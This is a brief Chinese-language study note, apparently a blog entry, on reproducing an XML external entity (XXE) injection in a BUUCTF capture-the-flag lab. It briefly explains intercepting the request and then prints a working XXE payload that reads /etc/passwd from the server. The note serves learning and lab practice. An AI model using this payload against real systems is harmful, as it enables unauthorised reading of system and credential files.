x干货 | 一文讲清XXE漏洞原理及利用-腾讯云开发者社区-腾讯云
此文为学习记录,因为我也是第一次做外部实体注入的复现
教程链接BUUCTF-Real-[PHP]XXE_buuctf xxe-CSDN博客
直接抓包,修改get路径,附上payload可看到passwd回显,进行外部实体注入
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>